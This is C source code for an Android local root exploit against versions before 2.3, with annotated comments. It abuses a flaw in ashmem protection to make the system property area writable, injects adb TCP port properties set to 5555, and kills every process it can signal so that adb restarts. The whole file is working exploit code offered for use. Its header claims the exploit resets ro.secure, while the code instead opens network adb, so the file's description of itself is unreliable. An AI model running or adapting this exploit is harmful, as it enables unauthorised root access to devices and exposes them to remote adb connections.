  1. /* ro.secure reset exploit for all androids < 2.3.
  2. *
  3. * Rage Against The Machine: Killing In The Name Of
  4. *
  5. * (C) 2010 The Android Exploid Crew
  6. * This exploit resets ro.secure to 0 even if executed as user.
  7. * Then re-connect to the device via "adb -d shell" to get a rootshell.
  8. *
  9. * Explanation:
  10. * The /dev/ashmem protection implementation is buggy. Anyone can
  11. * re-map the shared mem (which is owned by init and contains the system
  12. * properties) to R/W permissions. Then simply re-set ro.secure to 0
  13. * and restart adb which then runs as root rather than shell-user.
  14. */
  15.  
  16. #include <stdio.h>
  17. #include <sys/mman.h>
  18. #include <sys/types.h>
  19. #include <unistd.h>
  20. #include <fcntl.h>
  21. #include <errno.h>
  22. #include <string.h>
  23. #include <signal.h>
  24. #include <stdlib.h>
  25.  
  26.  
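/*
 * Print `msg` followed by the text for the current errno, then terminate.
 *
 * Exiting with errno as the status (the original behaviour) reports success
 * (0) whenever the caller bails out of a check that never set errno, e.g.
 * the "Cannot find prop area" path in main().  Fall back to EXIT_FAILURE in
 * that case so callers and scripts can distinguish failure from success.
 */
void die(const char *msg)
{
	int err = errno;	/* capture before perror(), which may clobber it */

	perror(msg);
	exit(err ? err : EXIT_FAILURE);
}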
  32.  
  33. #define PA_SIZE 32768
  34. #define PA_INFO_START 1024
  35. #define DEFAULTPROP 0x40000000
  36. #define PROP_NAME_MAX 32
  37. #define PROP_VALUE_MAX 92
  38.  
/*
 * One property record inside the shared property area.
 *
 * This struct is never allocated here; main() overlays it on the mapped
 * region (prop + PA_INFO_START), so field order and sizes must match the
 * layout of that region exactly.
 */
struct prop_info {
	char name[PROP_NAME_MAX];	/* NUL-terminated property name */
	unsigned volatile serial;	/* volatile: presumably updated by another process -- see file header */
	char value[PROP_VALUE_MAX];	/* NUL-terminated property value */
};
  44.  
  45.  
/*
 * Header of the shared property area, overlaid on the mapping base by main().
 *
 * `toc` is declared with a single element but create_new_prop() indexes it
 * up to `count`; it is an open-ended table in the real mapping, so sizeof
 * this struct must not be used to size anything.
 */
struct prop_area {
	unsigned volatile count;	/* number of live entries in toc[] */
	unsigned volatile serial;
	unsigned magic;
	unsigned version;
	unsigned reserved[4];
	unsigned toc[1];		/* entry = (name length << 24) | byte offset of the prop_info from this header */
};
  54.  
  55.  
/*
 * Locate the base address of this process's mapping of the property area.
 *
 * Reads /proc/self/maps line by line, stops at the first line whose path
 * mentions "system_properties", and parses the start of its "start-end"
 * field as a hex address.  Returns NULL when no such line exists or the
 * line has no '-' separator; note that errno is not set on that path.
 * Exits via die() if the maps file cannot be opened.  A parse failure in
 * strtoul() is not detected and also yields NULL (strtoul returns 0).
 */
char *find_prop_area()
{
	char line[256];
	char *base = NULL;
	FILE *maps = fopen("/proc/self/maps", "r");

	if (!maps)
		die("[-] fopen");

	while (fgets(line, sizeof line, maps)) {
		char *dash;

		if (!strstr(line, "system_properties"))
			continue;

		dash = strchr(line, '-');
		if (dash) {
			*dash = '\0';	/* isolate the start address */
			base = (char *)strtoul(line, NULL, 16);
		}
		break;
	}

	fclose(maps);
	return base;
}
  79.  
  80.  
/*
 * "Restart" adb by sending SIGKILL to every process this user is allowed
 * to signal (pid -1).  This is not targeted at adbd: it also terminates
 * the calling process itself and any other process of the same uid.  The
 * file header explains why the author expects adb to come back afterwards.
 */
void restart_adb()
{
	(void)kill(-1, SIGKILL);
}
  85.  
/*
 * Append one property entry to a property area that has been made writable.
 *
 * Copies `name` and `value` (including their terminators) into the prop_info
 * slot at index pa->count relative to `pi`, records that slot in the TOC as
 * (name length << 24) | (byte offset of the slot from `pa`), then increments
 * pa->count.  There is no check of the lengths against PROP_NAME_MAX /
 * PROP_VALUE_MAX, pa->toc is indexed past its declared size of one, and the
 * offset is formed through `unsigned` casts, so it is only meaningful for
 * 32-bit addresses.  The caller (main) guarantees the region is R/W first.
 */
void create_new_prop(char *name, char *value, struct prop_area *pa, struct prop_info *pi)
{
	int nlen = strlen(name);
	int vlen = strlen(value);
	struct prop_info *slot = pi + pa->count;

	memcpy(slot->name, name, nlen + 1);
	memcpy(slot->value, value, vlen + 1);

	/* TOC entry: length in the top byte, offset from the area header below it */
	pa->toc[pa->count] = (nlen << 24) | (((unsigned) slot) - ((unsigned) pa));
	pa->count++;
}
  99.  
/*
 * Entry point.
 *
 * Finds this process's mapping of the system property area, changes its
 * protection to read/write with mprotect() (the file header describes the
 * ashmem weakness in Android < 2.3 that lets an unprivileged process do
 * this), appends two adb TCP-port properties, forces their values, and
 * finally SIGKILLs every process it can so adb is restarted.
 *
 * argc/argv are unused.  Returns 0 on success; all failure paths go through
 * die().
 */
int main(int argc, char **argv)
{
	char *prop = NULL;
	struct prop_info *pi = NULL;
	struct prop_area *pa = NULL;

	/* 'y' once the respective property has been seen and set in the scan below */
	char svc = 'n', pst = 'n';


	printf("[*] CVE-2010-743C Android local root exploit (C) 2010 743C\n");
	printf("[*] The Android Exploid Crew Gentlemens club - dominating robots since 2008.\n\n");
	printf("[*] Donate to 7-4-3-C@web.de if you like\n\n");

	sleep(3);	/* banner delay only; no functional purpose */

	prop = find_prop_area();

	/* find_prop_area() returns NULL without setting errno on this path */
	if (!prop)
		die("[-] Cannot find prop area");

	printf("[+] Found prop area @ %p\n", prop);
	/* The mapping is normally read-only; on affected builds this succeeds for any user */
	if (mprotect(prop, PA_SIZE, PROT_READ|PROT_WRITE) < 0)
		die("[-] mprotect");

	/* Overlay the header and the first record on the now-writable region */
	pi = (struct prop_info *)(prop + PA_INFO_START);
	pa = (struct prop_area *)prop;

	create_new_prop("service.adb.tcp.port", "5555", pa, pi);
	create_new_prop("persist.adb.tcp.port", "5555", pa, pi);
	printf("created properties\n");
	/* NOTE: pa->count is unsigned; %u would be the matching specifier */
	printf("count: %d\n", pa->count);

	/*
	 * Walk every record and force the two values.  The post-decrement acts on
	 * the shared header itself, so the area's count is left altered when the
	 * loop ends: reduced by the number of iterations on `break`, or wrapped
	 * to UINT_MAX if the loop runs until count reaches 0.
	 */
	while (pa->count--) {
	//printf("[*] %s: %s\n", pi->name, pi->value);

		if (strcmp(pi->name, "service.adb.tcp.port") == 0) {
			strcpy(pi->value, "5555");	/* short literal; fits in PROP_VALUE_MAX */
			printf("[+] service.adb.tcp.port\n");
	//break;
			svc = 'y';
		}
		if (strcmp(pi->name, "persist.adb.tcp.port") == 0) {
			strcpy(pi->value, "5555");
			printf("[+] persist.adb.tcp.port\n");
			pst = 'y';
		}

		/* stop early once both properties have been handled */
		if(pst == 'y' && svc == 'y')
			break;
		++pi;
	}

	printf("[*] Restarting adb. Please reconnect for rootshell (adb kill-server; adb -d shell).\n");
	/* flush first: restart_adb() kills this process as well, so buffered output would be lost */
	fflush(stdout); sleep(2);
	restart_adb();
	return 0;
}